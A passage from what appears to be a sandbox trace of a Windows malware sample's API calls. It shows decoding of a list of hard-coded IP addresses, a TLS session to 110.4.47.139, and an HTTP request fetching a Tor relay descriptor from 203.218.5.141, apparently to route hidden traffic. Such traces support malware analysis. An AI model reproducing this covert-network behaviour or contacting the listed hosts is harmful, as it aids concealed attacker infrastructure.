dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] CryptStringToBinaryA (in: pszString="CECZCfRkc5Qvcz4Sa3jynTiNYPU", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] malloc (_Size=0x74) returned 0x3d8cee8 [0119.448] inet_addr (cp="144.172.71.182") returned 0xb647ac90 [0119.448] CryptStringToBinaryA (in: pszString="CFUny9ZIX9R1rJg/qGg6LZAouqg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] CryptStringToBinaryA (in: pszString="CFUny9ZIX9R1rJg/qGg6LZAouqg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] malloc (_Size=0x74) returned 0x3d8d268 [0119.448] inet_addr (cp="173.66.150.209") returned 0xd19642ad [0119.448] CryptStringToBinaryA (in: pszString="CGH0lm4ZnAup2x2QTbS8hDUI8Sw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] CryptStringToBinaryA (in: pszString="CGH0lm4ZnAup2x2QTbS8hDUI8Sw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d74918, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d74918, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] malloc (_Size=0x74) returned 0x3d8cf68 [0119.448] inet_addr (cp="98.193.69.56") returned 0x3845c162 [0119.448] CryptStringToBinaryA (in: pszString="CGnqUDN3xwJmm8dd16WQlGWN+gg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] CryptStringToBinaryA (in: pszString="CGnqUDN3xwJmm8dd16WQlGWN+gg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] malloc (_Size=0x74) returned 0x3d8d1e8 [0119.448] inet_addr (cp="151.177.28.122") returned 0x7a1cb197 [0119.448] CryptStringToBinaryA (in: pszString="CIJECHQDSvvi+/FkY6KQ8yeOJPc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] CryptStringToBinaryA (in: pszString="CIJECHQDSvvi+/FkY6KQ8yeOJPc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d74918, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d74918, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] malloc (_Size=0x74) returned 0x3d8d4e8 [0119.448] inet_addr (cp="176.58.121.159") returned 0x9f793ab0 [0119.448] CryptStringToBinaryA (in: pszString="CIpiN+7Yft6w4eOtCkpBn5Y/B4c", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] CryptStringToBinaryA (in: pszString="CIpiN+7Yft6w4eOtCkpBn5Y/B4c", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.448] malloc (_Size=0x74) returned 0x3d8d568 [0119.449] inet_addr (cp="176.9.40.67") returned 0x432809b0 [0119.449] CryptStringToBinaryA (in: pszString="CJMY0vo9oDBr8sGfFazCT+LpJtE", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] CryptStringToBinaryA (in: pszString="CJMY0vo9oDBr8sGfFazCT+LpJtE", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] malloc (_Size=0x74) returned 0x3d8df68 [0119.449] inet_addr (cp="174.96.93.125") returned 0x7d5d60ae [0119.449] CryptStringToBinaryA (in: pszString="CKLGCKcWEBHrAo+zOHQUmVWSBYQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] CryptStringToBinaryA (in: pszString="CKLGCKcWEBHrAo+zOHQUmVWSBYQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] malloc (_Size=0x74) returned 0x3d8e0e8 [0119.449] inet_addr (cp="95.216.148.234") returned 0xea94d85f [0119.449] CryptStringToBinaryA (in: pszString="CKW1o5605qH0ciTvwZMZKmM6PNg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] CryptStringToBinaryA (in: pszString="CKW1o5605qH0ciTvwZMZKmM6PNg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] malloc (_Size=0x74) returned 0x3d8d968 [0119.449] inet_addr (cp="141.193.21.89") returned 0x5915c18d [0119.449] CryptStringToBinaryA (in: pszString="CMbu12yJOLc4MWo0qikjxDLsBbE", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] CryptStringToBinaryA (in: pszString="CMbu12yJOLc4MWo0qikjxDLsBbE", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] malloc (_Size=0x74) returned 0x3d8e5e8 [0119.449] inet_addr (cp="84.61.105.135") returned 0x87693d54 [0119.449] CryptStringToBinaryA (in: pszString="CM2dQiQFjcl6HydnmlvuVyTExuw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] CryptStringToBinaryA (in: pszString="CM2dQiQFjcl6HydnmlvuVyTExuw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] malloc (_Size=0x74) returned 0x3d8e3e8 [0119.449] inet_addr (cp="195.123.212.113") returned 0x71d47bc3 [0119.449] CryptStringToBinaryA (in: pszString="CM49v9qifbbARKZ3r2jXI1wq/IU", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] CryptStringToBinaryA (in: pszString="CM49v9qifbbARKZ3r2jXI1wq/IU", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.449] malloc (_Size=0x74) returned 0x3d8e668 [0119.450] inet_addr (cp="195.176.3.20") returned 0x1403b0c3 [0119.450] CryptStringToBinaryA (in: pszString="CM5mM2MUjpkllXJKKym/juaNMqQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.450] CryptStringToBinaryA (in: pszString="CM5mM2MUjpkllXJKKym/juaNMqQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.450] malloc (_Size=0x74) returned 0x3d8dc68 [0119.450] inet_addr (cp="51.75.254.63") returned 0x3ffe4b33 [0119.450] CryptStringToBinaryA (in: pszString="CNjsYFpc93tqw/nPNPorMubw6zo", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.450] CryptStringToBinaryA (in: pszString="CNjsYFpc93tqw/nPNPorMubw6zo", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d74998, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d74998, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.450] malloc (_Size=0x74) returned 0x3d8e168 [0119.450] inet_addr (cp="51.38.69.99") returned 0x63452633 [0119.450] CryptStringToBinaryA (in: pszString="COlTCzmfenGTYGZYazGmaHcGZFg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.450] CryptStringToBinaryA (in: pszString="COlTCzmfenGTYGZYazGmaHcGZFg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.450] malloc (_Size=0x74) returned 0x3d8d9e8 [0119.450] inet_addr (cp="31.201.243.70") returned 0x46f3c91f [0119.450] CryptStringToBinaryA (in: pszString="COxc917pmoBRqI36Qe5gz2NfWiE", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.450] CryptStringToBinaryA (in: pszString="COxc917pmoBRqI36Qe5gz2NfWiE", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.450] malloc (_Size=0x74) returned 0x3d8da68 [0119.450] inet_addr (cp="5.252.162.237") returned 0xeda2fc05 [0119.450] CryptStringToBinaryA (in: pszString="CPBqDdr6v5om/LLjkqFDX54EghY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.450] CryptStringToBinaryA (in: pszString="CPBqDdr6v5om/LLjkqFDX54EghY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d74cb8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d74cb8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.450] malloc (_Size=0x74) returned 0x3d8e068 [0119.450] inet_addr (cp="195.201.168.111") returned 0x6fa8c9c3 [0119.450] CryptStringToBinaryA (in: pszString="CPRpK2CGJkD2iLhoJrZvMN6nq3M", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0120.433] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x558 [0120.433] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x55c [0120.433] malloc (_Size=0x8) returned 0x3f4bf48 [0120.434] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x339fc3c | out: pbBuffer=0x339fc3c) returned 1 [0120.435] free (_Block=0x3de7008) [0120.435] free (_Block=0x0) [0120.435] free (_Block=0x3f4c068) [0120.435] free (_Block=0x0) [0120.435] malloc (_Size=0x10) returned 0x3648758 [0120.435] SetEvent (hEvent=0x558) returned 1 [0120.435] malloc (_Size=0xc8) returned 0x3d81910 [0120.435] inet_ntoa (in=0x8b2f046e) returned="110.4.47.139" [0120.436] InitSecurityInterfaceA () returned 0x7445a140 [0120.436] atexit (param_1=0x74192e7f) returned 0 [0120.437] AcquireCredentialsHandleA (in: pszPrincipal=0x0, pszPackage="Microsoft Unified Security Protocol Provider", fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x339fb40, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x3d8193c, ptsExpiry=0x0 | out: phCredential=0x3d8193c, ptsExpiry=0x0) returned 0x0 [0121.824] gethostbyname (name="110.4.47.139") returned 0x42b838*(h_name="110.4.47.139", h_aliases=0x42b848*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x42b84c*=([0]="110.4.47.139")) [0121.826] htons (hostshort=0x1bb) returned 0xbb01 [0121.826] socket (af=2, type=1, protocol=6) returned 0x5b0 [0121.827] connect (s=0x5b0, name=0x339fb98*(sa_family=2, sin_port=0x1bb, sin_addr="110.4.47.139"), namelen=16) returned 0 [0122.007] InitializeSecurityContextA (in: phCredential=0x3d8193c, phContext=0x0, pszTargetName=0x3648890, fContextReq=0xc11c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x3d81944, pOutput=0x3d819a4, pfContextAttr=0x3d819b4, ptsExpiry=0x0 | out: phNewContext=0x3d81944, pOutput=0x3d819a4, pfContextAttr=0x3d819b4, ptsExpiry=0x0) returned 0x90312 [0122.025] send (s=0x5b0, buf=0x3d6938*, len=151, flags=0) returned 151 [0122.026] FreeContextBuffer (in: pvContextBuffer=0x3d6938 | out: pvContextBuffer=0x3d6938) returned 0x0 [0122.026] recv (in: s=0x5b0, buf=0x3de7008, len=32768, flags=0 | out: buf=0x3de7008*) returned 1016 [0122.291] InitializeSecurityContextA (in: phCredential=0x3d8193c, phContext=0x3d81944, pszTargetName=0x3648890, fContextReq=0xc11c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3d81998, Reserved2=0x0, phNewContext=0x3d81944, pOutput=0x3d819a4, pfContextAttr=0x3d819b4, ptsExpiry=0x0 | out: phNewContext=0x3d81944, pOutput=0x3d819a4, pfContextAttr=0x3d819b4, ptsExpiry=0x0) returned 0x90312 [0122.319] send (s=0x5b0, buf=0x42adb0*, len=126, flags=0) returned 126 [0122.320] FreeContextBuffer (in: pvContextBuffer=0x42adb0 | out: pvContextBuffer=0x42adb0) returned 0x0 [0122.320] recv (in: s=0x5b0, buf=0x3de7008, len=32768, flags=0 | out: buf=0x3de7008*) returned 51 [0122.496] InitializeSecurityContextA (in: phCredential=0x3d8193c, phContext=0x3d81944, pszTargetName=0x3648890, fContextReq=0xc11c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3d81998, Reserved2=0x0, phNewContext=0x3d81944, pOutput=0x3d819a4, pfContextAttr=0x3d819b4, ptsExpiry=0x0 | out: phNewContext=0x3d81944, pOutput=0x3d819a4, pfContextAttr=0x3d819b4, ptsExpiry=0x0) returned 0x0 [0132.615] QueryContextAttributesA (in: phContext=0x3d81944, ulAttribute=0x4, pBuffer=0x3d81960 | out: pBuffer=0x3d81960) returned 0x0 [0132.615] free (_Block=0x3648680) [0132.615] SetEvent (hEvent=0x558) returned 1 [0132.615] malloc (_Size=0x2) returned 0x3f4c0b8 [0132.615] free (_Block=0x0) [0132.615] malloc (_Size=0x7) returned 0x3f4bf88 [0132.616] free (_Block=0x0) [0132.616] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fb4c, MessageSeqNo=0x0 | out: pMessage=0x339fb4c) returned 0x0 [0132.616] send (s=0x5b0, buf=0x3689268*, len=36, flags=0) returned 36 [0132.617] free (_Block=0x3f4bf88) [0132.617] free (_Block=0x3f4c0b8) [0132.617] DecryptMessage (in: phContext=0x3d81944, pMessage=0x339fb24, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb24, pfQOP=0x0) returned 0x80090318 [0132.822] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 2080 [0132.822] DecryptMessage (in: phContext=0x3d81944, pMessage=0x339fb24, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb24, pfQOP=0x0) returned 0x0 [0132.822] malloc (_Size=0x6) returned 0x3f4bfe8 [0132.822] free (_Block=0x0) [0132.822] malloc (_Size=0x6) returned 0x3f4bf68 [0132.823] free (_Block=0x0) [0132.823] free (_Block=0x0) [0132.823] free (_Block=0x3f4bfe8) [0132.823] free (_Block=0x3f4bf68) [0132.823] malloc (_Size=0x5c2) returned 0x3624008 [0132.823] free (_Block=0x0) [0132.823] malloc (_Size=0x5c2) returned 0x36245d8 [0132.823] free (_Block=0x0) [0132.823] free (_Block=0x0) [0132.823] free (_Block=0x3624008) [0132.823] free (_Block=0x36245d8) [0132.823] malloc (_Size=0x26) returned 0x60de88 [0132.823] free (_Block=0x0) [0132.823] malloc (_Size=0x26) returned 0x60de28 [0132.823] free (_Block=0x0) [0132.823] free (_Block=0x0) [0132.823] free (_Block=0x60de88) [0132.823] free (_Block=0x60de28) [0132.823] malloc (_Size=0x1fd) returned 0x369ed88 [0132.824] free (_Block=0x0) [0132.824] malloc (_Size=0x1fd) returned 0x3d81e60 [0132.824] free (_Block=0x0) [0132.824] free (_Block=0x0) [0132.824] free (_Block=0x369ed88) [0132.824] free (_Block=0x3d81e60) [0132.824] time (in: timer=0x0 | out: timer=0x0) returned 0x5f9969bf [0132.824] malloc (_Size=0x11) returned 0x3f61360 [0132.824] free (_Block=0x0) [0132.824] malloc (_Size=0x11) returned 0x3f65440 [0132.824] free (_Block=0x0) [0132.824] malloc (_Size=0x202) returned 0x369ed88 [0132.824] free (_Block=0x0) [0132.824] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fafc, MessageSeqNo=0x0 | out: pMessage=0x339fafc) returned 0x0 [0132.824] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0132.839] free (_Block=0x369ed88) [0132.839] free (_Block=0x3f65440) [0132.839] free (_Block=0x3f61360) [0132.839] malloc (_Size=0x20) returned 0x3d80288 [0132.839] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74193cae, lpParameter=0x3d80288, dwCreationFlags=0x0, lpThreadId=0x3d80290 | out: lpThreadId=0x3d80290*=0x5a8) returned 0x380 [0132.840] GetTickCount () returned 0x11622d1 [0132.840] malloc (_Size=0x10) returned 0x3648920 [0132.840] free (_Block=0x0) [0132.840] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648920*=0x558, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0132.840] free (_Block=0x3648920) [0132.840] GetTickCount () returned 0x11622d1 [0132.840] malloc (_Size=0x10) returned 0x3648920 [0132.840] free (_Block=0x0) [0132.840] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648920*=0x558, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0134.762] free (_Block=0x3648920) [0134.762] GetTickCount () returned 0x1162a44 [0134.762] malloc (_Size=0x50) returned 0x3d9a988 [0134.762] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a4 [0134.763] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8 [0134.763] malloc (_Size=0x20) returned 0x3d80170 [0134.763] free (_Block=0x0) [0134.763] SetEvent (hEvent=0x3a4) returned 1 [0134.763] malloc (_Size=0x34) returned 0x36242b0 [0134.763] malloc (_Size=0x338) returned 0x606048 [0134.763] malloc (_Size=0x80) returned 0x60a248 [0134.763] free (_Block=0x0) [0134.763] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x60a248 | out: pbBuffer=0x60a248) returned 1 [0134.764] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f848, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f844 | out: phKey=0x339f844*=0x432af8) returned 1 [0134.794] CryptExportKey (in: hKey=0x432af8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f4a4, pdwDataLen=0x339f48c | out: pbData=0x339f4a4*, pdwDataLen=0x339f48c*=0x90) returned 1 [0134.795] free (_Block=0x60a248) [0134.795] CryptBinaryToStringA (in: pbBinary=0x3dd9b48, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x0, pcchString=0x339fb4c | out: pszString=0x0, pcchString=0x339fb4c) returned 1 [0134.795] malloc (_Size=0x29) returned 0x3624838 [0134.795] free (_Block=0x0) [0134.795] CryptBinaryToStringA (in: pbBinary=0x3dd9b48, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x3624838, pcchString=0x339fb4c | out: pszString="f174aa71e193aba5521beeadd5e6f2c8dd6f9df6", pcchString=0x339fb4c) returned 1 [0134.795] malloc (_Size=0x10) returned 0x3648920 [0134.796] free (_Block=0x0) [0134.796] malloc (_Size=0x10) returned 0x3648680 [0134.796] free (_Block=0x0) [0134.796] malloc (_Size=0x38) returned 0x36246b0 [0134.796] free (_Block=0x3648680) [0134.796] malloc (_Size=0x8) returned 0x3f4c038 [0134.796] free (_Block=0x0) [0134.796] malloc (_Size=0x10) returned 0x3648680 [0134.796] free (_Block=0x0) [0134.796] malloc (_Size=0x50) returned 0x3d9af08 [0134.796] free (_Block=0x3648680) [0134.796] malloc (_Size=0x150) returned 0x3d80800 [0134.796] free (_Block=0x3d9af08) [0134.796] malloc (_Size=0x550) returned 0x60deb8 [0134.797] free (_Block=0x3d80800) [0134.797] malloc (_Size=0x1550) returned 0x3def010 [0134.797] free (_Block=0x60deb8) [0134.799] malloc (_Size=0x5550) returned 0x348c1b8 [0134.801] free (_Block=0x3def010) [0134.801] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x339fa74 | out: pbBuffer=0x339fa74) returned 1 [0134.802] free (_Block=0x348c1b8) [0134.802] free (_Block=0x0) [0134.802] free (_Block=0x0) [0134.802] free (_Block=0x3f4c038) [0134.802] inet_ntoa (in=0x8d05dacb) returned="203.218.5.141" [0134.802] malloc (_Size=0xe) returned 0x3648680 [0134.802] free (_Block=0x0) [0134.802] gethostbyname (name="203.218.5.141") returned 0x42b838*(h_name="203.218.5.141", h_aliases=0x42b848*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x42b84c*=([0]="203.218.5.141")) [0134.804] htons (hostshort=0x50) returned 0x5000 [0134.804] socket (af=2, type=1, protocol=6) returned 0x5c8 [0134.805] connect (s=0x5c8, name=0x339fa50*(sa_family=2, sin_port=0x50, sin_addr="203.218.5.141"), namelen=16) returned 0 [0135.080] _vscprintf (_Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339fa18) returned 93 [0135.080] malloc (_Size=0x5e) returned 0x60e490 [0135.081] free (_Block=0x0) [0135.081] vsprintf_s (in: _DstBuf=0x60e490, _SizeInBytes=0x5e, _Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339fa18 | out: _DstBuf="GET /tor/server/fp/f174aa71e193aba5521beeadd5e6f2c8dd6f9df6 HTTP/1.0\r\nHost: 203.218.5.141\r\n\r\n") returned 93 [0135.081] send (s=0x5c8, buf=0x60e490*, len=94, flags=0) returned 94 [0135.081] recv (in: s=0x5c8, buf=0x339ea14, len=4096, flags=0 | out: buf=0x339ea14*) returned 2000 [0135.504] malloc (_Size=0x7d1) returned 0x60e6c0 [0135.504] free (_Block=0x0) [0135.504] recv (in: s=0x5c8, buf=0x339ea14, len=4096, flags=0 | out: buf=0x339ea14*) returned 419 [0135.504] malloc (_Size=0xbb9) returned 0x3def010 [0135.504] free (_Block=0x60e6c0) [0135.504] recv (in: s=0x5c8, buf=0x339ea14, len=4096, flags=0 | out: buf=0x339ea14) returned 0 [0135.505] closesocket (s=0x5c8) returned 0 [0135.505] malloc (_Size=0x8bd) returned 0x60e6c0 [0135.505] free (_Block=0x0) [0135.505] free (_Block=0x3def010) [0135.505] free (_Block=0x60e490) [0135.505] closesocket (s=0xffffffff) returned -1 [0135.505] free (_Block=0x0) [0135.506] free (_Block=0x3648680) [0135.506] free (_Block=0x0) [0135.506] free (_Block=0x36246b0) [0135.506] free (_Block=0x3648920) [0135.506] free (_Block=0x3624838) [0135.506] malloc (_Size=0x8bd) returned 0x3def010 [0135.506] free (_Block=0x0) [0135.506] malloc (_Size=0x26) returned 0x60dd38 [0135.506] free (_Block=0x0) [0135.506] malloc (_Size=0x40) returned 0x3e22590 [0135.506] free (_Block=0x0) [0135.506] free (_Block=0x0) [0135.506] memchr (_Buf=0x3def036, _Val=10, _MaxCount=0x896) returned 0x3def046 [0135.506] malloc (_Size=0x11) returned 0x3f61360 [0135.506] free (_Block=0x0) [0135.506] free (_Block=0x0) [0135.506] memchr (_Buf=0x3def047, _Val=10, _MaxCount=0x885) returned 0x3def063 [0135.506] malloc (_Size=0x1d) returned 0x3d80238 [0135.506] free (_Block=0x0) [0135.506] free (_Block=0x0) [0135.506] memchr (_Buf=0x3def064, _Val=10, _MaxCount=0x868) returned 0x3def0a4 [0135.506] malloc (_Size=0x41) returned 0x3defa40 [0135.506] free (_Block=0x0) [0135.506] free (_Block=0x0) [0135.506] memchr (_Buf=0x3def0a5, _Val=10, _MaxCount=0x827) returned 0x3def0e5 [0135.506] malloc (_Size=0x41) returned 0x3df0080 [0135.507] free (_Block=0x0) [0135.507] malloc (_Size=0x140) returned 0x3dd4128 [0135.507] free (_Block=0x3e22590) [0135.507] free (_Block=0x0) [0135.507] memchr (_Buf=0x3def0e6, _Val=10, _MaxCount=0x7e6) returned 0x3def122 [0135.507] malloc (_Size=0x3d) returned 0x3e22428 [0135.507] free (_Block=0x0) [0135.507] free (_Block=0x0) [0135.507] memchr (_Buf=0x3def123, _Val=10, _MaxCount=0x7a9) returned 0x3def13d [0135.507] malloc (_Size=0x1b) returned 0x3d800d0 [0135.507] free (_Block=0x0) [0135.507] free (_Block=0x0) [0135.507] memchr (_Buf=0x3def13e, _Val=10, _MaxCount=0x78e) returned 0x3def17c [0135.507] malloc (_Size=0x3f) returned 0x3e223e0 [0135.507] free (_Block=0x0) [0135.507] free (_Block=0x0) [0135.507] memchr (_Buf=0x3def17d, _Val=10, _MaxCount=0x74f) returned 0x3def19a [0135.507] malloc (_Size=0x1e) returned 0x3d801e8 [0135.507] free (_Block=0x0) [0135.507] free (_Block=0x0) [0135.507] memchr (_Buf=0x3def19b, _Val=10, _MaxCount=0x731) returned 0x3def223 [0135.507] malloc (_Size=0x89) returned 0x3d80460 [0135.507] free (_Block=0x0) [0135.507] free (_Block=0x0) [0135.507] memchr (_Buf=0x3def224, _Val=10, _MaxCount=0x6a8) returned 0x3def241 [0135.507] malloc (_Size=0x1e) returned 0x3d80328 [0135.507] free (_Block=0x0) [0135.508] free 